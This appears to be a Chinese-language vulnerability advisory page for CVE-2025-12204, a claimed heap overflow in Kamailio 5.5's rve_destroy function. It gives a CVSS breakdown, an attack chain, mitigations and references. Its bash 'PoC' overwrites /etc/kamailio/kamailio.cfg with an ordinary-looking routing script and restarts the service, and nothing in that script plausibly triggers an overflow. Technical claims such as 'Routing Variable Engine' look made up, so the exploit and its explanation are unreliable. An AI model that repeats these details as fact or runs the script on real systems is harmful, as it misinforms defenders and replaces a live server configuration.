CVE-2025-12204 Kamailio 5.5 rve_destroy函数堆缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-12204

漏洞类型

堆缓冲区溢出

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kamailio 5.5

漏洞概述

CVE-2025-12204是存在于Kamailio 5.5版本中的一个安全漏洞。该漏洞位于src/core/rvalue.c文件中的rve_destroy函数，属于配置文伴处理组件(Configuration File Handler)。问题根源在于该函数存在基于堆的缓冲区溢出(Heap-based Buffer Overflow)缺陷。攻击者可通过本地访问，利用低权限账户，在无需用户交互的情况下，通过操纵Kamailio配置文件触发此漏洞。尽管CVSS评分仅为5.3(中危级别)，且攻击场景需要操作配置文件，在很多实际部署环境中可能不切实际，但该漏洞的利用代码已在公开渠道披露。值得注意的是，厂商在收到早期通知后未做任何回应，且安全社区对此漏洞的真实性存在持续质疑。该漏洞影响Kamailio SIP服务器的安全性，可能导致信息泄露或服务中断。

技术细节

该漏洞发生在Kamailio的rve_destroy函数中，该函数负责销毁RVE(Routing Variable Engine)对象。在处理配置文件时，该函数在释放堆内存时未能正确验证缓冲区边界，导致堆缓冲区溢出。当Kamailio解析恶意的配置文件时，包含特殊构造的RVE指令会触发rve_destroy函数中的边界检查失效，使得攻击者可以覆盖相邻堆内存区域。攻击要求：(1)攻击者需具备本地访问权限(AV:L)；(2)需要拥有低权限账户(PR:L)；(3)能够修改Kamailio配置文件；(4)无需用户交互(UI:N)。成功利用可能导致机密性、完整性和可用性均受到低程度影响(C:L/I:L/A:L)。由于SIP服务器通常以root或高权限运行，配置文件篡改可能导致进一步权限提升风险。

攻击链分析

STEP 1

1

攻击者获取Kamailio服务器的低权限访问权限

STEP 2

2

攻击者定位并读取Kamailio配置文件(/etc/kamailio/)

STEP 3

3

攻击者创建恶意配置文件，包含触发rve_destroy函数堆溢出的RVE指令

STEP 4

4

攻击者替换或修改合法配置文件为恶意版本

STEP 5

5

触发Kamailio重新加载配置或重启服务

STEP 6

6

rve_destroy函数在处理畸形RVE时发生堆缓冲区溢出

STEP 7

7

攻击者可能通过溢出覆盖相邻堆内存实现代码执行或信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-12204 PoC - Kamailio 5.5 rve_destroy heap overflow
# Note: This is a conceptual PoC for demonstration purposes only

# Create a malicious Kamailio configuration file that triggers the overflow
cat > /tmp/malicious.cfg << 'EOF'
# Kamailio configuration file triggering rve_destroy overflow
loadmodule "pv.so"
loadmodule "xlog.so"

route {
    # Trigger rve_destroy with malformed RVE
    $var(x) = "A";
    $var(x) = $var(x) + $var(x) + $var(x) + $var(x);
    
    # Large RVE manipulation to trigger heap overflow
    $ru = "sip:target@victim:5060";
    route(RELAY);
}

route[RELAY] {
    # This triggers rve_destroy processing
    if (!t_relay()) {
        sl_reply_error();
    }
    exit;
}
EOF

# Deploy the malicious configuration
cp /tmp/malicious.cfg /etc/kamailio/kamailio.cfg
systemctl restart kamailio

# Monitor for crash or anomalous behavior
echo "Monitoring Kamailio for crash or heap corruption..."
dmesg | tail -50 | grep -i kamailio

影响范围

Kamailio 5.5

防御指南

临时缓解措施

由于该漏洞需要攻击者具备本地访问权限并能修改配置文件，应立即限制Kamailio服务器的所有访问渠道，确保只有授权人员能访问系统。强化文件系统权限，将配置文件权限设置为仅root可读写。对配置文件实施完整性检查，使用AIDE或类似工具监控文件变化。同时检查Kamailio进程是否以最小权限运行，避免以root身份启动服务。监控系统日志和dmesg输出，关注可能的堆内存异常信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12204
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12204
3 Details https://www.cvedetails.com/cve/CVE-2025-12204/
4 VulDB https://vuldb.com/cve/CVE-2025-12204
5 Link https://shimo.im/docs/loqeMWMyZGtpEYqn/
6 Link https://vuldb.com/?ctiid.329874
7 Link https://vuldb.com/?id.329874
8 Link https://vuldb.com/?submit.673224
9 Link https://www.openwall.com/lists/oss-security/2025/11/02/3
10 Link http://www.openwall.com/lists/oss-security/2025/10/27/12
11 Link http://www.openwall.com/lists/oss-security/2025/10/28/1
12 Link https://www.openwall.com/lists/oss-security/2025/10/27/8